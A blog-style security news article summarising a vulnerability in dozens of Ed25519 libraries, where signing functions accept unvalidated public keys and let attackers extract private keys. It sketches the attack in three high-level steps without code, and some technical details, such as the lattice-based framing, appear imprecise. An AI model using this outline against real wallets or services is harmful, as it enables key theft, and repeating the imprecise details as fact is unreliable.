Exploiting Ed25519: Vulnerabilities in Public Key Validation and Private Key Exposure Across Cryptographic Libraries

BY KEYHUNTER 03.04.2025

A critical vulnerability in implementations of the Ed25519 digital signature algorithm exposed private keys in dozens of cryptography libraries, primarily affecting blockchain and cryptocurrency platforms. The flaw stems from insecure API designs that allowed attackers to perform oracle-based private key extraction attacks[1][3].

Technical Breakdown
The vulnerability occurs when libraries implement a non-standard signing function that accepts pre-computed public keys as input parameters. While this optimization avoids recomputing public keys (saving ~50% signing time[1][3]), over 45 libraries failed to validate whether provided public keys matched their corresponding private keys[2]. Attackers could exploit this by:

  1. Making repeated API calls with manipulated public keys
  2. Using signature outputs to perform lattice-based cryptanalysis
  3. Gradually reconstructing private keys through mathematical inference[1][3]

Impact & Remediation

  • Affected: 45+ libraries including cryptocurrency wallets and fintech APIs[2][3]
  • Patched: 8 libraries as of May 2023 (e.g., Trezor, PASETO)[2]
  • Attack Surface: Crypto wallets, blockchain nodes, IoT devices using vulnerable implementations[1]

Security Implications
The vulnerability undermines Ed25519’s key advantages over ECDSA:

  • Deterministic signatures meant to eliminate RNG risks became attack vectors[1][3]
  • Performance gains from public-key precomputation created new attack surfaces[1]
  • Legacy issues from ECDSA-era attacks (e.g., PlayStation 3 key leaks) resurfaced in modern systems[1][3]

Summary
A widespread implementation flaw in Ed25519 libraries allowed private key theft through API-based oracle attacks, affecting 45+ cryptographic implementations. While some projects have patched the vulnerability, the incident highlights recurring challenges in securely implementing cryptographic optimizations – particularly the balance between performance and strict input validation. The persistence of such vulnerabilities across decades (from ECDSA to Ed25519) underscores the critical need for formal verification in cryptographic software development[1][2][3].

Citations:
[1] https://www.blackhatethicalhacking.com/news/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft/
[2] https://github.com/MystenLabs/ed25519-unsafe-libs
[3] https://portswigger.net/daily-swig/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft
[4] https://cure53.de/pentest-report_ed25519.pdf
[5] https://polubelova.github.io/files/phd_slides.pdf
[6] https://arxiv.org/abs/2107.04940